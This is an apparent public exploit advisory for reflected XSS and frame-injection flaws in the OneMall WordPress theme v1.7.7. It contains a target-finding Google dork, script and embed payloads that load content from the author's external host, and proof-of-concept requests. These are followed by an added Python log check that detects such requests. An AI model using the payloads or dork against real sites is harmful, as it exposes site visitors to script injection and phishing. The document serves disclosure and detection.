OneMall WordPress theme v1.7.7 - Unauthenticated Reflected XSS & XFS

2020.10.28
Ex.Mi (RU)
Risk: Low
Local: No
Remote: Yes
CVE: N/A

[+] :: Exploit Title: OneMall WordPress theme v1.7.7 - Unauthenticated Reflected XSS & XFS
[+] :: Google Dork: inurl:/wp-content/themes/onemall/
[+] :: Date: 2020-10-20
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: MAGENTECH [ https://www.magentech.com ]
[+] :: Software Version: 1.7.7
[+] :: Software Link: https://themeforest.net/item/onemall-the-multipurpose-ecommerce-marketplace-wordpress-theme/20685400
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79, CWE-1021

[i] :: Info:
Unauthenticated reflected XSS and XFS vulnerabilities were discovered in the OneMall theme v1.7.7 for WordPress.

[$] :: Payloads:
"><script src=https://ex-mi.ru/payload/a2r.js></script>
"><embed src=https://ex-mi.ru/payload/xfsii.html>

[!] :: PoC Unauthenticated Reflected XSS:
https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product

[!] :: PoC Unauthenticated Reflected XSS (Burp Suite):
GET /themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1
Host: demo.wpthemego.com

[!] :: PoC Unauthenticated XFS:
https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E&search_posttype=product

[!] :: PoC Unauthenticated XFS (Burp Suite):
GET /themes/sw_onemall/layout2/wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E HTTP/1.1
Host: demo.wpthemego.com

[@] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex-mi

References:

https://ex-mi.ru/exploit/[2020-10-20]-[WordPress]-onemall-theme-v1.7.7.txt
https://themeforest.net/item/onemall-the-multipurpose-ecommerce-marketplace-wordpress-theme/20685400
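
Added example (not part of the original advisory and not the theme's code): a log check that flags requests whose search term decodes to HTML markup in the two parameters the PoC requests use, the search parameter s and the query parameter of the sw_search_products_callback AJAX action. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Markup that has no place in a search term: a tag opening, or a quote
# followed by '>' (attribute breakout).
MARKUP_RE = re.compile(r'<[a-zA-Z!/]|["\']\s*>')

def search_params(url):
    """Return the decoded search terms from the parameters named in the advisory."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)
    values = list(qs.get("s", []))                 # theme search form
    if (parts.path.endswith("/wp-admin/admin-ajax.php")
            and "sw_search_products_callback" in qs.get("action", [])):
        values += qs.get("query", [])              # AJAX product search
    return values

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for search terms carrying markup."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for value in search_params(m.group(1)):
            if MARKUP_RE.search(value):
                hits.append((n, value))
    return hits

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Oct/2020:10:00:01 +0000] "GET /?category=&s=red+shoes&search_posttype=product HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Oct/2020:10:00:07 +0000] "GET /?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fexample.invalid%2Fx.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1" 200 5344',
    '203.0.113.9 - - [20/Oct/2020:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fexample.invalid%2Fx.html%3E HTTP/1.1" 200 812',
    '203.0.113.7 - - [20/Oct/2020:10:00:12 +0000] "GET /wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=phone HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for n, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {n}: {value!r}")
```

A hit shows that markup was submitted, not that it was reflected unescaped; confirm against the response or the installed theme version.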

